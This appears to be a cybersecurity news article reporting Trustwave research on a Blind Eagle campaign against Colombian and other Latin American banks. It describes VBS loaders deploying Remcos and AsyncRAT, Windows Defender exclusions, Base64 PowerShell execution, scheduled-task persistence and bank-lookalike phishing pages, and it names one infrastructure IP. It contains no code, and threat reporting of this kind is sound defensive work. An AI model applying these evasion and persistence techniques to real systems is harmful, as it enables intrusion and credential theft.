Blind Eagle Hackers Leverage Open-Source RATs and Ciphers to Evade Static Detection

Trustwave SpiderLabs has uncovered a chilling cyber threat targeting Latin American organizations, particularly in the financial sector, with a focus on Colombian institutions.

The threat cluster, linked to the notorious Proton66 OOO infrastructure, employs a cunning mix of open-source Remote Access Trojans (RATs) and advanced obfuscation techniques to bypass static detection mechanisms.

Unmasking a Sophisticated Threat in Latin America

By pivoting from Proton66-associated assets, researchers identified an active infrastructure cluster characterized by interconnected domains and IP addresses, predominantly relying on Visual Basic Script (VBS) files as the initial attack vector.

This campaign, which gained traction in summer 2024, utilizes free Dynamic DNS (DDNS) services and hosts malicious content on IP addresses like 45.135.232.38, revealing a calculated yet surprisingly exposed operation.

The operational tactics of these threat actors, often referred to as Blind Eagle in cybersecurity circles, showcase a blend of simplicity and effectiveness.

Their infrastructure heavily features phishing pages mimicking prominent Colombian banks such as Bancolombia, BBVA, Banco Caja Social, and Davivienda, designed to harvest sensitive user credentials through meticulously crafted HTML, CSS, and image files that replicate legitimate login portals.

Phishing and Malware Deployment

Alongside these phishing efforts, VBS scripts act as loaders for second-stage malware, often deploying publicly available RATs like Remcos and AsyncRAT.

These scripts, frequently obfuscated using tools from subscription-based services like “Crypters and Tools,” incorporate techniques such as privilege escalation, Windows Defender exclusions for entire drives, and registry key deletions for cleanup.

Despite the high-value targets, the infrastructure shows minimal effort toward concealment, with open directories exposing phishing pages and malware files, reflecting a prioritization of rapid deployment over stealth.

The use of platforms like paste.ee, textbin.net, and direct IPv4 references for payload delivery further underscores the campaign’s reliance on accessible, low-cost resources.

This campaign’s botnet management panel, featuring a Brazilian Portuguese interface, offers operators extensive control over compromised hosts, including command execution, file exfiltration, and payload deployment.

With dashboards revealing hundreds of infected machines primarily in Argentina and contextual control options for individual victims, the panel exemplifies the operational simplicity of commodity RAT suites.

The lack of segmentation, consistent domain naming patterns, and reuse of SSL certificates across the infrastructure highlight a glaring oversight by the threat actors, making their operations vulnerable to detection despite their regional success.

Trustwave’s analysis also reveals the use of Base64-encoded strings executed via PowerShell and scheduled tasks to ensure persistence, with payloads often disguised as DLL files before loading the final RATs for command-and-control (C2) communication.

For organizations in Latin America, especially within the financial sector, this threat underscores the urgent need for robust defenses.

Banking-themed phishing emails tailored to regional audiences pose a significant risk, necessitating advanced email filtering solutions like Trustwave MailMarshal, alongside regular staff training on localized phishing tactics.

Proactive monitoring of regionally targeted infrastructure and threat indicators can further mitigate the risk of compromise.

While the Blind Eagle campaign may lack sophistication in concealment, its ability to scale across the LATAM region signals a growing cyber threat that demands immediate attention and fortified cybersecurity measures to protect sensitive data and critical systems from these persistent adversaries.

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates